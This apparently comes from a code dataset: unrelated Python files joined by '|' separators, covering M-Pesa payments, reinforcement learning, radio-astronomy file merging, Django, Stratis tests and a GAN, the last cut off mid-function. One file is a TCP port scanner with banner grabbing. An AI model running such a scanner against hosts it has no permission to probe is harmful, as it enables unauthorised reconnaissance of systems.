assert(mpesa_express_business_shortcode !=
None), "missing mpesa_express_business_shortcode"
lipa_na_mpesa_passkey = os.getenv("LIPA_NA_MPESA_PASSKEY")
assert(lipa_na_mpesa_passkey != None), "Missing lipa_na_mpesa_passkey"
def generate_request_passwd(timestamp: str) -> str:
"""
Generates the password used to encrypt the request sent for an STK push transaction.
:timestamp - This is the Timestamp of the transaction, normaly in the formart of
YEAR+MONTH+DATE+HOUR+MINUTE+SECOND (YYYYMMDDHHMMSS)
:return - A base64 encoded string
"""
data_to_encode = mpesa_express_business_shortcode + \
lipa_na_mpesa_passkey + timestamp
password = base64.b64encode(data_to_encode.encode("utf-8"))
password = password.decode("utf-8")
return password
|
from agent import Qnet
from agent import ReplayBuffer
from agent import train
q = Qnet()
q_target = Qnet()
q_target.load_state_dict(q.state_dict())
memory = ReplayBuffer()
print_interval = 20
score = 0.0
optimizer = optim.Adam(q.parameters(), lr=learning_rate)
score_history= []
for n_epi in range(3000):
epsilon = max(0.01, 0.08 - 0.01*(n_epi/200)) #Linear annealing from 8% to 1%
s = env.reset(random_init=True)
done = False
n_step =0
while not done:
n_step +=1
a = q.sample_action(torch.from_numpy(np.array(s)).float(), epsilon)
s_prime, r, done = env.transition(a)
done_mask = 0.0 if done else 1.0
memory.put((s,a,r,s_prime, done_mask))
score += r
if done:
break
s = s_prime
if memory.size()>2000:
train(q, q_target, memory, optimizer)
if n_epi%print_interval==0 and n_epi!=0:
q_target.load_state_dict(q.state_dict())
print("n_episode :{}, score : {:.1f}, n_buffer : {}, eps : {:.1f}%, n_step:{}".format(n_epi, score/print_interval, memory.size(), epsilon*100, n_step))
score_history.append(score/print_interval)
score = 0.0 |
r''' Source file for merge_dats_logs() '''
from os import chdir, getcwd, listdir, remove, rename
PREFIX = "_c_"
DEBUGGING = False
DATLNFMT = '{:>4s} {:>12s} {:>12s} {:>12s} {:>12s} {:>9s} {:>12s} {:>12s}' \
+ '{:>4s} {:>12s} {:>5s} {:>9s}\n'
def merge_dats_logs(arg_h5: str, arg_dir: str, arg_type: str, cleanup='n'):
r"""
Merge multiple DAT (or LOG) files.
Parameters
----------
arg_h5 : str
HDF5 file used by :func:`~turbo_seti.find_doppler.find_doppler.FindDoppler.search`
to produce the DAT and LOG files.
arg_dir : str
Directory holding multiple DAT and LOG files after FindDoppler.search()
which ran with more than 1 partition.
arg_type : str
File extension of interest ('dat' or 'log').
"""
print("merge_dats_logs: dir={}, type={}, cleanup={}"
.format(arg_dir, arg_type, cleanup))
RETURN_TO = getcwd() # Save our current directory path
chdir(arg_dir) # Change directory
suffix = '.' + arg_type # E.g. .dat
files = []
filenamestem = arg_h5.split('/')[-1].replace('.h5', '')
len_filenamestem = len(filenamestem)
print('merge_dats_logs: Working on filename-stem {} type {}'
.format(filenamestem, arg_type))
sorted_file_list = sorted(listdir(arg_dir))
counter = 0
if DEBUGGING:
print("DEBUG merge_dats_logs: listdir=", sorted_file_list)
for cur_file in sorted_file_list:
cur_type = cur_file.split('.')[-1]
if cur_type == arg_type and not cur_file.startswith(PREFIX):
# This is the type of file we are looking for.
# and it is not the combination version we are building.
# Does cur_file match the HDF5 file?
if cur_file[0:len_filenamestem] == filenamestem:
files.append(cur_file)
if DEBUGGING:
print("DEBUG merge_dats_logs: Selected for merging: ", cur_file)
counter += 1
if counter < 1:
print("*** merge_dats_logs: Nothing selected for merging")
chdir(RETURN_TO)
return
# Append the combo file with each list member.
path_prefixed_combo = PREFIX + filenamestem + suffix
with open(path_prefixed_combo, "w") as outfile:
# Write first file encountered fully.
with open(files[0], "r") as fd:
for line in fd:
outfile.write(line)
# Write subsequent files, filtering out comment lines (start with '#')
if arg_type == 'dat':
tophit_counter = 0
for cur_file in files[1:]:
with open(cur_file, "r") as fd:
for inline in fd:
if not inline.startswith("#"): # not a comment
if arg_type == 'dat': # renumber tophit number field
tophit_counter += 1
outlist = inline.split()
if DEBUGGING:
print('DEBUG outlst:', outlist)
outlist[0] = str(tophit_counter)
outfile.write(DATLNFMT.format(*outlist))
else: # log file
outfile.write(inline)
# if cleanup is requested, do it now.
if cleanup == 'y':
# Remove all of the partitions.
for cur_file in files:
remove(cur_file)
if DEBUGGING:
print("merge_dats_logs: Removed: ", cur_file)
# Rename the merged file
path_merge_file = filenamestem + suffix
try:
rename(path_prefixed_combo, path_merge_file)
print("merge_dats_logs: Merged into", path_merge_file)
except Exception as exc:
print("*** os.rename({}, {}) failed, reason:{}\n"
.format(path_prefixed_combo, path_merge_file, str(exc)))
# Change back to caller's current directory
chdir(RETURN_TO)
|
dummy_compute = False
dummy_mun_codes = [147,151,153,165,400]
dummy_mun_codes_4char = [f'0{m}' for m in dummy_mun_codes]
cell_label = 'DDKNm100'
years_num = list(range(2010,2020))
years = [str(y) for y in years_num]
years_hh = [f'{y}_hh' for y in years]
years_pers = [f'{y}_pers' for y in years]
mean_cols = ['mean_pers', 'mean_hh']
minimum_cols= ['minimum_pers', 'minimum_hh'] |
# modified into a class
import socket
from IPy import IP
from termcolor import colored
class PortScan():
banners = []
open_ports = []
def __init__(self, target, port_num):
self.target = target
self.port_num = port_num
def scan(self):
for port in range(1, 100):
self.scan_port(port)
# convert target name into ip address
def check_ip(self):
try:
IP(self.target)
return self.target
except ValueError:
return socket.gethostbyname(self.target)
# Try connection
def scan_port(self, port):
try:
converted_ip = self.check_ip()
sock = socket.socket()
sock.settimeout(0.5)
sock.connect((converted_ip, port))
self.open_ports.append(port)
try:
banner = sock.recv(1024).decode().strip('\n').strip('\r')
self.banners.append(banner)
except:
self.banners.append(' ')
sock.close()
except:
pass
|
import logging
from tornado.ioloop import IOLoop
from tornado.gen import coroutine
from tornado import autoreload
from django.conf import settings
from .workers import (TickerWatcher, TransactionsWatcher,
OrdersWatcher, Monitoring)
log = logging.getLogger(__name__)
@coroutine
def main_loop():
log.info('starting main loop')
workers = [
Monitoring(),
TickerWatcher(),
TransactionsWatcher(),
OrdersWatcher()
]
# First run them sequentially to avoid race conditions.
for worker in workers:
yield worker.run_once()
# Then forever in parallel.
yield [worker.run_forever() for worker in workers]
def main():
if settings.DEBUG:
log.info('starting Tornado autoreload')
autoreload.start()
log.info('*** main() ***')
try:
IOLoop.instance().run_sync(main_loop)
except KeyboardInterrupt:
log.info('^C, quitting')
if __name__ == '__main__':
main()
|
from integrations.new_relic.new_relic import NewRelicWrapper, EVENTS_API_URI
def test_new_relic_initialized_correctly():
# Given
api_key = "123key"
app_id = "123id"
base_url = "http://test.com"
# When initialized
new_relic = NewRelicWrapper(base_url=base_url, api_key=api_key, app_id=app_id)
# Then
expected_url = f"{base_url}{EVENTS_API_URI}{app_id}/deployments.json"
assert new_relic.url == expected_url
def test_new_relic_when_generate_event_data_with_correct_values_then_success():
# Given
log = "some log data"
email = "tes@email.com"
env = "test"
new_relic = NewRelicWrapper(
base_url="http://test.com", api_key="123key", app_id="123id"
)
# When
event_data = new_relic.generate_event_data(
log=log, email=email, environment_name=env
)
# Then
expected_event_text = f"{log} by user {email}"
assert event_data.get("deployment") is not None
event_deployment_data = event_data.get("deployment")
assert event_deployment_data["revision"] == f"env:{env}"
assert event_deployment_data["changelog"] == expected_event_text
def test_new_relic_when_generate_event_data_with_with_missing_values_then_success():
# Given
log = None
email = None
env = "test"
new_relic = NewRelicWrapper(
base_url="http://test.com", api_key="123key", app_id="123id"
)
# When
event_data = new_relic.generate_event_data(
log=log, email=email, environment_name=env
)
# Then
expected_event_text = f"{log} by user {email}"
assert event_data.get("deployment") is not None
event_deployment_data = event_data.get("deployment")
assert event_deployment_data["revision"] == f"env:{env}"
assert event_deployment_data["changelog"] == expected_event_text
def test_new_dog_when_generate_event_data_with_with_missing_env_then_success():
# Given environment
log = "some log data"
email = "tes@email.com"
env = None
new_relic = NewRelicWrapper(
base_url="http://test.com", api_key="123key", app_id="123id"
)
# When
event_data = new_relic.generate_event_data(
log=log, email=email, environment_name=env
)
# Then
expected_event_text = f"{log} by user {email}"
assert event_data.get("deployment") is not None
event_deployment_data = event_data.get("deployment")
assert event_deployment_data["revision"] == f"env:{env}"
assert event_deployment_data["changelog"] == expected_event_text
|
from django.db import models
from django.contrib.auth.models import User
from PIL import Image
import io
from django.core.files.storage import default_storage as storage
from phonenumber_field.modelfields import PhoneNumberField
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE,
verbose_name="Пользователь")
phone = PhoneNumberField(null=False, blank=True, verbose_name="Телефон")
image = models.ImageField(default='default.jpg',
upload_to='profile_pics',
verbose_name="Изображение")
class Meta:
verbose_name = 'Профиль'
verbose_name_plural = 'Профили'
def __str__(self):
return f'{self.user.username} Profile'
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
img_read = storage.open(self.image.name, 'r')
img = Image.open(img_read)
if img.height > 300 or img.width > 300:
output_size = (300, 300)
img.thumbnail(output_size)
in_mem_file = io.BytesIO()
img.convert('RGB').save(in_mem_file, format='JPEG')
img_write = storage.open(self.image.name, 'w+')
img_write.write(in_mem_file.getvalue())
img_write.close()
img_read.close()
|
from django.urls import reverse
def test_sales_dashboard_index(superuser_authenticated_client):
"""
VERY basic test to check that the index page loads.
"""
# Given
url = reverse("sales_dashboard:index")
# When
response = superuser_authenticated_client.get(url)
# Then
assert response.status_code == 200
|
# Copyright 2019 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests of the stratis CLI.
"""
# isort: STDLIB
import argparse
import sys
import time
import unittest
# isort: THIRDPARTY
from testlib.stratis import STRATIS_CLI, clean_up
from testlib.utils import exec_command, exec_test_command, fs_n, p_n, process_exists
DISKS = []
def make_test_pool(pool_disks):
"""
Create a test pool that will later get destroyed
:param list pool_disks: List of disks with which the pool will be created
:return: Name of the created pool
"""
pool_name = p_n()
(return_code, _, stderr) = exec_test_command(
[STRATIS_CLI, "pool", "create", pool_name] + pool_disks
)
assert return_code == 0, "return_code: %s, stderr: %s" % (return_code, stderr)
return pool_name
def make_test_filesystem(pool_name):
"""
Create a test filesystem that will later get destroyed
:param pool_name: Name of a test pool
:return: Name of the created filesystem
"""
filesystem_name = fs_n()
(return_code, _, stderr) = exec_test_command(
[STRATIS_CLI, "filesystem", "create", pool_name, filesystem_name]
)
assert return_code == 0, "return_code: %s, stderr: %s" % (return_code, stderr)
return filesystem_name
class StratisCertify(unittest.TestCase):
"""
Unit tests for Stratis
"""
def setUp(self):
"""
Setup for an individual test.
* Register a cleanup action, to be run if the test fails.
* Ensure that stratisd is running via systemd.
* Use the running stratisd instance to destroy any existing
Stratis filesystems, pools, etc.
* Call "udevadm settle" so udev database can be updated with changes
to Stratis devices.
:return: None
"""
self.addCleanup(clean_up)
if process_exists("stratisd") is None:
exec_command(["systemctl", "start", "stratisd"])
time.sleep(20)
clean_up()
exec_command(["udevadm", "settle"])
def unittest_command( # pylint: disable=bad-continuation
self, args, exp_exit_code, exp_stderr_is_empty, exp_stdout_is_empty
):
"""
Execute a test command and make assertions about the exit code, stderr, and stdout
:param list args: The arguments needed to execute the Stratis command being tested
:type args: List of str
:param exp_exit_code: The expected exit code, 0, 1, or 2
:param bool exp_stderr_is_empty: True if stderr is expected to be empty, otherwise False
:param bool exp_stdout_is_empty: True if stdout is expected to be empty, otherwise False
:return: None
"""
exit_code, stdout, stderr = exec_test_command(args)
self.assertEqual(exit_code, exp_exit_code)
if exp_stderr_is_empty:
self.assertEqual(stderr, "")
else:
self.assertNotEqual(stderr, "")
if exp_stdout_is_empty:
self.assertEqual(stdout, "")
else:
self.assertNotEqual(stdout, "")
def test_stratisd_version(self):
"""
Test getting the daemon version.
"""
self.unittest_command([STRATIS_CLI, "daemon", "version"], 0, True, False)
def test_stratisd_redundancy(self):
"""
Test listing the redundancy levels that the Stratis service supports.
"""
self.unittest_command([STRATIS_CLI, "daemon", "redundancy"], 0, True, False)
def test_pool_list_empty(self):
"""
Test listing a non-existent pool.
"""
self.unittest_command([STRATIS_CLI, "pool", "list"], 0, True, False)
def test_filesystem_list_empty(self):
"""
Test listing an non-existent filesystem.
"""
self.unittest_command([STRATIS_CLI, "filesystem", "list"], 0, True, False)
def test_pool_create(self):
"""
Test creating a pool.
"""
pool_name = p_n()
self.unittest_command(
[STRATIS_CLI, "pool", "create", pool_name, DISKS[0]], 0, True, True
)
def test_pool_list_not_empty(self):
"""
Test listing an existent pool.
"""
make_test_pool(DISKS[0:1])
self.unittest_command([STRATIS_CLI, "pool", "list"], 0, True, False)
def test_blockdev_list(self):
"""
Test listing a blockdev.
"""
self.unittest_command([STRATIS_CLI, "blockdev", "list"], 0, True, False)
def test_pool_create_same_name(self):
"""
Test creating a pool that already exists.
"""
self.unittest_command(
[STRATIS_CLI, "pool", "create", make_test_pool(DISKS[0:1]), DISKS[1]],
1,
False,
True,
)
def test_pool_add_cache(self):
"""
Test adding cache to a pool.
"""
self.unittest_command(
[STRATIS_CLI, "pool", "add-cache", make_test_pool(DISKS[0:2]), DISKS[2]],
0,
1,
True,
)
def test_pool_destroy(self):
"""
Test destroying a pool.
"""
self.unittest_command(
[STRATIS_CLI, "pool", "destroy", make_test_pool(DISKS[0:1])], 0, True, True
)
def test_filesystem_create(self):
"""
Test creating a filesystem.
"""
filesystem_name = fs_n()
self.unittest_command(
[
STRATIS_CLI,
"filesystem",
"create",
make_test_pool(DISKS[0:1]),
filesystem_name,
],
0,
True,
True,
)
def test_pool_add_data(self):
"""
Test adding data to a pool.
"""
pool_name = make_test_pool(DISKS[0:1])
self.unittest_command(
[STRATIS_CLI, "pool", "add-data", pool_name, DISKS[1]], 0, True, True
)
def test_filesystem_list_not_empty(self):
"""
Test listing an existent filesystem.
"""
pool_name = make_test_pool(DISKS[0:1])
make_test_filesystem(pool_name)
self.unittest_command([STRATIS_CLI, "filesystem", "list"], 0, True, False)
def test_filesystem_create_same_name(self):
"""
Test creating a filesystem that already exists.
"""
pool_name = make_test_pool(DISKS[0:1])
filesystem_name = make_test_filesystem(pool_name)
self.unittest_command(
[STRATIS_CLI, "filesystem", "create", pool_name, filesystem_name],
1,
False,
True,
)
def test_filesystem_rename(self):
"""
Test renaming a filesystem to a new name.
"""
pool_name = make_test_pool(DISKS[0:1])
filesystem_name = make_test_filesystem(pool_name)
fs_name_rename = fs_n()
self.unittest_command(
[
STRATIS_CLI,
"filesystem",
"rename",
pool_name,
filesystem_name,
fs_name_rename,
],
0,
True,
True,
)
def test_filesystem_rename_same_name(self):
"""
Test renaming a filesystem to the same name.
"""
pool_name = make_test_pool(DISKS[0:1])
filesystem_name = make_test_filesystem(pool_name)
self.unittest_command(
[
STRATIS_CLI,
"filesystem",
"rename",
pool_name,
filesystem_name,
filesystem_name,
],
1,
False,
True,
)
def test_filesystem_snapshot(self):
"""
Test snapshotting a filesystem.
"""
pool_name = make_test_pool(DISKS[0:1])
filesystem_name = make_test_filesystem(pool_name)
snapshot_name = fs_n()
self.unittest_command(
[
STRATIS_CLI,
"filesystem",
"snapshot",
pool_name,
filesystem_name,
snapshot_name,
],
0,
True,
True,
)
def test_filesystem_destroy(self):
"""
Test destroying a filesystem.
"""
pool_name = make_test_pool(DISKS[0:1])
filesystem_name = make_test_filesystem(pool_name)
self.unittest_command(
[STRATIS_CLI, "filesystem", "destroy", pool_name, filesystem_name],
0,
True,
True,
)
if __name__ == "__main__":
ARGUMENT_PARSER = argparse.ArgumentParser()
ARGUMENT_PARSER.add_argument(
"--disk", action="append", dest="DISKS", help="disks to use", required=True
)
PARSED_ARGS, OTHER_ARGS = ARGUMENT_PARSER.parse_known_args()
DISKS = PARSED_ARGS.DISKS
print("Using block device(s) for tests: %s" % DISKS)
unittest.main(argv=sys.argv[:1] + OTHER_ARGS)
|
import requests
import json
def main():
noSpaces = ''
noSpaces = input('Do you want the words with spaces?(y/n)\n').strip().lower()
while(True):
if noSpaces == 'n':
noSpaces = True
break
elif noSpaces == 'y':
noSpaces = False
break
else:
noSpaces = input('Answer with \'y\' or \'n\':\n')
# get the current patch number for League of Legends
response = requests.get('https://ddragon.leagueoflegends.com/api/versions.json')
if response:
json_res = json.loads(response.content)
current_ver = json_res[0]
else:
print('API call for game patch number failed')
# get the list of all champions
response = requests.get('http://ddragon.leagueoflegends.com/cdn/{}/data/en_US/champion.json'.format(current_ver))
if response:
json_res = json.loads(response.content)
champions = [champ['name'] for champ in json_res['data'].values()]
f = open('lol_champion_names.txt', 'w')
formatted = ',\n'.join(champions)
if noSpaces:
formatted = formatted.replace(' ','')
print("Check lol_champion_names.txt")
f.write(formatted)
else:
print('API call for champions failed')
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
import os
import sys
import time
import numpy as np
import models
from keras.utils import generic_utils
import general_utils
from data_utils import *
from image_history_buffer import *
from IPython import display
from models import *
from additional_models import *
from collections import deque
from ImageDataGenerator import *
from time import sleep
class _GAN:
def __init__(self, gen, disc, disc_entropy,DCGAN,GenClass,classificator, batch_size, img_source_dim,
img_dest_dim, noise_dim, noise_scale, lr_D, lr_G, deterministic, inject_noise, model, lsmooth,
img_buffer, datagen, disc_type, data_aug, n_classes, disc_iters,name, dir ):
self.generator_model = gen
self.discriminator_model = disc
self.discriminator2 = disc_entropy
self.DCGAN_model = DCGAN
self.GenClass_model = GenClass
self.classificator_model = classificator
self.batch_size = batch_size
self.img_source_dim = img_source_dim
self.img_dest_dim = img_dest_dim
self.bn_mode = 2
self.noise_dim = noise_dim
self.noise_scale = noise_scale
self.lr_D = lr_D
self.lr_G = lr_G
self.deterministic = deterministic
self.inject_noise = inject_noise
self.img_buffer = img_buffer
self.datagen = datagen
self.model = model
self.lsmooth = lsmooth
self.disc_type = disc_type
self.dir=dir
self.disc_iters=disc_iters
self.data_aug = data_aug
self.img_dim = img_dest_dim
self.n_classes = n_classes
self.name = name
def load_data(img_dim, image_dim_ordering, dset):
# Load and normalize data
if dset == "mnistM":
X_source_train, Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(
img_dim, image_dim_ordering, dset='mnist')
X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(
img_dim, image_dim_ordering, dset='mnistM')
elif dset == "svhn_to_mnist":
X_source_train,Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(img_dim, image_dim_ordering,dset='svhn')
X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist')
elif dset == "svhn_to_mnist32":
X_source_train,Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(img_dim, image_dim_ordering,dset='svhn32')
X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist32')
elif dset == "svhn_to_mnist32gray":
X_source_train,Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(img_dim, image_dim_ordering,dset='svhn32gray')
X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist32')
elif dset == "mnist_to_svhn32gray":
X_source_train,Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist32')
X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='svhn32gray')
elif dset == "mnist_to_svhn32":
X_source_train,Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist32')
X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='svhn32')
elif dset == "mnist_to_usps":
X_source_train,Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist')
X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='usps')
elif dset == "usps_to_mnist":
X_source_train,Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(img_dim, image_dim_ordering,dset='usps')
X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist')
elif dset == "MnistMtoMnist":
X_source_train, Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(
img_dim, image_dim_ordering, dset='mnist')
X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(
img_dim, image_dim_ordering, dset='mnistM')
elif dset == "OfficeAmazonToDslr":
X_source_train, Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(
img_dim, image_dim_ordering, dset='OfficeAmazon')
X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(
img_dim, image_dim_ordering, dset='OfficeDslr')
elif dset == "OfficeAmazonToWebcam":
X_source_train, Y_source_train, X_source_test, Y_source_test, n_classes1 = load_image_dataset(
img_dim, image_dim_ordering, dset='OfficeAmazon')
X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(
img_dim, image_dim_ordering, dset='OfficeWebcam')
else:
print "dataset not supported"
if n_classes1 != n_classes2: # sanity check
print "number of classes mismatch between source and dest domains"
n_classes = n_classes1
img_source_dim = X_source_train.shape[-3:] # is it backend agnostic?
img_dest_dim = X_dest_train.shape[-3:]
if (dset == "mnist_to_usps") or (dset == "usps_to_mnist"):
X_source=X_source_train
Y_source=Y_source_train
X_dest=X_dest_train
Y_dest=Y_dest_train
else:
X_dest = np.concatenate([X_dest_train, X_dest_test], axis=0)
Y_dest = np.concatenate([Y_dest_train, Y_dest_test], axis=0)
X_source = np.concatenate([X_source_train, X_source_test], axis=0)
Y_source = np.concatenate([Y_source_train, Y_source_test], axis=0)
return X_source, Y_source, X_dest, Y_dest, n_classes, img_source_dim, img_dest_dim
def load_testset(img_dim, image_dim_ordering, dset):
# Load and normalize data
if dset == "mnistM":
X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(
img_dim, image_dim_ordering, dset='mnistM')
elif dset == "svhn_to_mnist32":
X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist32')
elif dset == "svhn_to_mnist32gray":
X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='mnist32')
elif dset == "mnist_to_svhn32gray":
X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='svhn32gray')
elif dset == "mnist_to_svhn32":
X_dest_train,Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering,dset='svhn32')
elif dset == "OfficeAmazonToDslr":
X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering, dset='OfficeDslr')
elif dset == "OfficeAmazonToWebcam":
X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering, dset='OfficeWebcam')
elif dset == "usps_to_mnist":
X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering, dset='mnist')
elif dset == "mnist_to_usps":
X_dest_train, Y_dest_train, X_dest_test, Y_dest_test, n_classes2 = load_image_dataset(img_dim, image_dim_ordering, dset='usps')
else:
print "dataset not supported in load_testset function!"
test_data=X_dest_test
test_labels=Y_dest_test
return test_data, test_labels
def build_opt(opt_D, opt_G, lr_D, lr_G,lr_rec=None,opt_rec=None):
_opt_D = get_optimizer(opt_D, lr_D)
_opt_G = get_optimizer(opt_G, lr_G)
_opt_C = get_optimizer('SGD', 0.01)
_opt_Z = get_optimizer('Adam', lr_G)
if opt_rec is None:
return _opt_D, _opt_G, _opt_C, _opt_Z
else:
_opt_rec = get_optimizer(opt_rec, lr_rec)
return _opt_D, _opt_G, _opt_C, _opt_Z, _opt_rec
def load_compile_reconstructions(generator_model1, generator_model2,noise_dim,img_source_dim1,img_source_dim2,opt_G, opt_rec, classificator_model2=None):
rec1 = models.reconstructor(generator_model1, generator_model2, noise_dim, img_source_dim1)
rec2 = models.reconstructor(generator_model2, generator_model1, noise_dim, img_source_dim2)
rec1.compile(loss='mse', optimizer=opt_rec)
rec2.compile(loss='mse', optimizer=opt_rec)
if classificator_model2 is not None:
models.make_trainable(generator_model1, False) #because generator_model1 is already trained by a classificator in a supervised setting
models.make_trainable(generator_model2, True)
models.make_trainable(classificator_model2, True)
recClass = models.reconstructorClass(generator_model1, generator_model2, classificator_model2, noise_dim, img_source_dim1)
recClass.compile(loss='categorical_crossentropy', optimizer=opt_rec)
return rec1,rec2,recClass
else:
return rec1,rec2
def load_compile_models(noise_dim, img_source_dim, img_dest_dim, deterministic, pureGAN, wd, loss1, loss2, disc_type, n_classes, opt_D, opt_G, opt_C, opt_Z,suffix=None,pretrained=False):
# LOAD MODELS:
generator_model = models.generator_google_mnistM(
noise_dim, img_source_dim, img_dest_dim, deterministic, pureGAN, wd,suffix)
discriminator_model,discriminator2 = models.discriminator_dcgan_doubled(img_dest_dim, wd,n_classes,disc_type)
# classificator_model = models.classificator_svhn(img_dest_dim, n_classes, wd)
if pretrained:
classificator_model = models.resnet50classifier(img_dest_dim, n_classes, wd)
else:
classificator_model = models.classificator_google_mnistM(img_dest_dim, n_classes, wd)
DCGAN_model = models.DCGAN_naive(generator_model, discriminator_model, noise_dim, img_source_dim)
GenClass_model = models.DCGAN_naive2(generator_model, classificator_model, noise_dim, img_source_dim)
if not deterministic:
zclass_model = z_coerence(generator_model, img_source_dim, bn_mode=2, wd=wd,
inject_noise=False, n_classes=n_classes, noise_dim=noise_dim, model_name="zClass")
# COMPILE MODELS:
generator_model.compile(loss=loss1, optimizer=opt_G)
models.make_trainable(discriminator_model, False)
models.make_trainable(discriminator2, False)
models.make_trainable(classificator_model, False)
if disc_type == "simple_disc":
DCGAN_model.compile(loss=[loss1], optimizer=opt_G)
models.make_trainable(discriminator_model, True)
discriminator_model.compile(loss=[loss1], optimizer=opt_D)
elif disc_type == "nclass_disc":
DCGAN_model.compile(loss=loss1, optimizer=opt_G)
GenClass_model.compile(loss=['categorical_crossentropy'], optimizer=opt_G)
models.make_trainable(discriminator_model, True)
models.make_trainable(discriminator2, True)
discriminator_model.compile(loss=loss1, optimizer=opt_D)
discriminator2.compile(loss=loss2, optimizer=opt_D)
models.make_trainable(classificator_model, True)
classificator_model.compile(loss=loss2, metrics=['accuracy'], optimizer=opt_C)
if not deterministic:
zclass_model.compile(loss=[loss1], optimizer=opt_Z)
return generator_model, discriminator_model,discriminator2, classificator_model, DCGAN_model,GenClass_model, zclass_model
else:
return generator_model, discriminator_model,discriminator2, classificator_model, DCGAN_model,GenClass_model, None
def load_pretrained_weights(generator_model, discriminator_model,discriminator2, DCGAN_model, name, data, labels, noise_scale, classificator_model=None, resume=False):
if resume: # loading previous saved model weights and checking actual performance
load_model_weights(generator_model, discriminator_model, DCGAN_model, name, classificator_model, discriminator2=discriminator2)
#loss4, acc4 = classificator_model.evaluate(data, labels, batch_size=512, verbose=0)
#print('\n Classifier Accuracy on full target domain: %.2f%%' % (100 * acc4))
def load_buffer_and_augmentation(history_size, batch_size, img_source_dim, n_classes):
max_history_size = int(history_size * batch_size)
img_buffer = ImageHistoryBuffer(
(0,) + img_source_dim, max_history_size, batch_size, n_classes)
datagen = ImageDataGenerator(rotation_range=0.45,
width_shift_range=0.1,
height_shift_range=0.1,
fill_mode='nearest')
# datagen = ImageDataGenerator(elastic_distortion=True)
return img_buffer, datagen
def get_loss_list():
list_disc_loss_real = deque(10 * [0], 10)
list_disc_loss_gen = deque(10 * [0], 10)
list_gen_loss = deque(10 * [0], 10)
list_zclass_loss = deque(10 * [0], 10)
list_classifier_loss = deque(10 * [0], 10)
list_GenClass_loss = deque(10 * [0], 10)
l_rec = deque(10 * [0], 10)
l_recClass = deque(10 * [0], 10)
return list_disc_loss_real, list_disc_loss_gen, list_gen_loss, list_zclass_loss, list_classifier_loss, l_rec, list_GenClass_loss, l_recClass
def get_batch(A_data, A_labels, B_data, B_labels, batch_size):
A_data_batch, A_labels_batch, _ = next(gen_batch(A_data, A_labels, batch_size))
B_data_batch, B_labels_batch, _ = next(gen_batch(B_data, B_labels, batch_size))
return A_data_batch, A_labels_batch, B_data_batch, B_labels_batch
def train_gan(GAN, disc_iters, A_data, A_labels, B_data, B_labels, batch_counter, l_disc_real, l_disc_gen, l_gen,l_GenClass,class_weight):
if GAN.dir == 'BtoA':
for disc_it in range(disc_iters):
A_data_batch, A_labels_batch, B_data_batch, B_labels_batch = get_batch(A_data, A_labels, B_data, B_labels, GAN.batch_size)
X_source_batch = B_data_batch
#Y_source_batch = B_labels_batch
X_dest_batch = A_data_batch
Y_dest_batch = A_labels_batch
##########
# Create a batch to feed the discriminator model
#########
X_noise = sample_noise(GAN.noise_scale, GAN.batch_size, GAN.noise_dim)
gen_output = GAN.generator_model.predict([X_noise,X_source_batch])
#X_disc_real, X_disc_gen = get_disc_batch(X_dest_batch, GAN.generator_model, batch_counter, GAN.batch_size,
# GAN.noise_dim, X_source_batch, noise_scale=GAN.noise_scale)
if GAN.disc_type == "simple_disc":
current_labels_real = np.ones(GAN.batch_size)
current_labels_gen = np.zeros(GAN.batch_size)
